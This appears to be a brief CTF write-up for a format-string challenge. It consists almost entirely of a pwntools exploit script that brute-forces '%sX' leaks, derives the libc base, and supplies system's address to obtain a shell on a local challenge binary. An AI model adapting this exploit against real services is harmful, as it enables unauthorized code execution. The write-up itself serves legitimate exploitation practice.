Format

I can’t recall the exact name of this challenge since I upload it here after the CTF, but it was an interesting one, where you needed to leak using the “sX” specifier, (I did brute force a bunch :D) After that you needed the system address to get a shell. nice one!

#!/usr/bin/python3
from pwn import *
gs = '''
continue
'''
elf = context.binary = ELF('./chal')
context.terminal = ['tmux', 'splitw', '-hp', '70']

libc = elf.libc

def start():
    if args.GDB:
        return gdb.debug('./chal', gdbscript=gs)
    if args.REMOTE:
        return remote('127.0.0.1', 5555)
    else:
        return process( './chal')
r = start()
#========= exploit here ===================
#specifiers = [
#    "d", "i", "u", "o", "x", "X", "c", "s", "%", 
#    "ld", "li", "lu", "lo", "lx", "lX", 
#    "zd", "zi", "zu", "zo", "zx", "zX", 
#    "jd", "ji", "ju", "jo", "jx", "jX", 
#    "td", "ti", "tu", "to", "tx", "tX"
#]
#0x7fffffffc918 - 0x7fffffffbf30
for i in range(0xe90+7+8):
    formatted_specifier = f"%sX"
    r.sendline(b"1")
    log.info(f"try # {hex(i)}")
    r.sendline(formatted_specifier.encode("ascii"))
    r.recvuntil(b"Here: ")
    leak = r.recvuntil(b"1.").split(b"1.")[0]
    log.info(leak)

r.sendline(b"1")
log.info(f"leaking")
r.sendline(formatted_specifier.encode("ascii"))
r.recvuntil(b"XXXXXXXXX\x0e")
leak = u64(r.recvline().strip().split(b"X1.")[0][-6:].ljust(8,b"\x00"))

#leak = u64(r.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
log.info(f"leak = {hex(leak)}")
libc.address = leak - 0x5840
log.info(f"libc = {hex(libc.address)}")
#0x7f2be6adfda5 - 0x7f2be6800000 =  0x2dfda5
log.info(f"system = {hex(libc.sym.system)}")
#win
sleep(1)
r.sendlineafter(b'call', b'2')
log.info("Enter system address to get a shell")
sleep(1)

r.sendline(hex(libc.sym.system))

#========= interactive ====================
r.interactive()